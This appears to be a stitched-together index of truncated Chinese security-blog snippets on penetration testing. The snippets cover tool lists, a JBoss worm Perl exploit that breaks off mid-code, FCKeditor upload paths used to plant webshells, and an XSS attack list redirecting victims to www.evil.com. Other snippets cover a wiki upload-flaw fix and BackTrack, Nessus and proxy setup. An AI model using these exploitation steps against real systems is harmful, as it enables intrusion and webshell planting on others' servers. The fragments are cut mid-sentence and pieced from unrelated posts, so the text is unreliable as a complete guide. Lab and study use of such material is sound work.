blrk

http://hi.baidu.com/52hmily/item/715c213222e3bcc31b969695

sqlmap, pangolinhttp抓包：Fidderettercap：中间人攻击uptime.netcraft.com：由域名查询ip范围www.exploitdownloads.com

http://www.99d.comhttp://www.downza.cn/soft/6087.html

0day拼的是特长，渗透拼的是综合能力。要想发现事物的异常情况，最有效的方法就是洞悉事物本身。

# -*- coding: cp936 -*-import wximport osimport hashlibclass TextFrame(wx.Frame): def __init__(self): wx.Frame.__init__(self, None, -1, 'md5Cracker By blrk', size=(500, 300));

发一下最近整理的一个小东西吧。JBOSS蠕虫。。。首先发一个exp#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 \n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/

Fckeditor jsp版漏洞利用方法：http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F用这个地址查找上传图片的路径，存在漏洞的话应该返回一个xml文件，如图

出现上传漏洞的地址是： http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了，马儿上传到的位置是: http://www.xxx.co

1、漏洞：编辑词条，上传图片，服务端未作类型判断，导致直接上传php文件，从而获取webshell。修复：修改文件wiki/control/attachment.php    // 禁止上传除了jgp、gif、png后缀的其他文件    if ($extname != "jpg" && $extname != "gif" && $extname != "png")    {

http:///includes/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://http://%2Ffckeditor%2Feditor

http://www.cnblogs.com/keepfocus/archive/2011/11/01/2231576.html

选择：Ubuntu 11.10 / Ubuntu 12.04(32 bits):Nessus-4.4.1-ubuntu1110_i386.deb (24668KB)下载安装。。。进入文件所在目录。。输入命令  dpkg -i Nessus-4.4.1-ubuntu1110_i386.deb 查看大图 =安装完毕后进入目录opt/nessus/sb

http://ha.ckers.org/xss.html

首先通过构造XSS代码的方法来构造XSS脚本，用以测试发现漏洞，然后利用以下方法实现攻击。（1）Redirection - 重定向重定向被攻击者，如document.location=http://www.evil.com（2）Clickjacking - 点击劫持可用来钓鱼，如通过onclick触发（3）URL Spoofing - URL欺骗常用于钓鱼，页面被劫持并且信

http://netsecurity.51cto.com/art/200812/102951.htm

好文章啊，要收藏。http://www.cnblogs.com/hyddd/archive/2009/07/02/1515768.html

http://115.com/file/dpupioz2#BackTrack中文指南V9.pdf  BackTrack 5 汉化图文教程

Metasploit推出了Metasploitable这个操作系统，是以Vmware 6.5的镜像形式发布的，其实就是Ubuntu 8.04 + 各种数据库+各种网络服务，当然都没有打补丁，因而整个系统漏洞随处可见，弱口令，溢出......使用MSF工具时，Metasploitable是一个不错的练手的系统。但可惜在MSF的主站仅提供了torrent的下载，对于教育网的我来说，速度很低，还需要开国

bt5一改之前的黑色调，转为暗红，还是那潇洒的飞龙，在红色底纹上更显杀气。------------- 磁盘分区最少要在10G以上，系统安装配置完成后就有8G了， KDE，GNOME桌面运行要求大一点内存，最好1G以上之后一直选择默认 前进 提示重启 -选择重启，重新启动系统，注意在启动过程中会提示移除磁盘文件。5.默认bt5是没有启动网络的，所以启动后需

网上搜了一堆，都不能连外网，可能是想的太多了，结果这样就行了： 要先开启VMware NAT Service和VMware DHCPService两个服务。 （1）查看你的连接外网的网卡的属性，选择“高级”标签，设置成允许共享，并设定允许的网络接口为VMNET8(NAT)（2）vim /etc/network/interfacesauto loiface lo inet

（1）vim /root/.bashrc        在文件末尾添加：        http_proxy=http://username:password@yourproxyaddress:proxyport（2）export http_proxy（3）运行如下命令使设置生效：        . /root/.bashrc

可以通过三种方法为apt-get设置http代理方法一这是一种临时的手段，如果您仅仅是暂时需要通过http代理使用apt-get，您可以使用这种方式。在使用apt-get之前，在终端中输入以下命令（根据您的实际情况替换yourproxyaddress和proxyport）。export http_proxy=http://yourproxyaddress:proxyport方法

challenges目录中的htaccess文件，添加一句：php_flag magic_quotes_gpc offphp magic_quotes_gpc的详细使用方法：http://developer.51cto.com/art/200911/165392.htmphp 防sql注入函数mysql_real_escape_string()：http://www.piaoyi.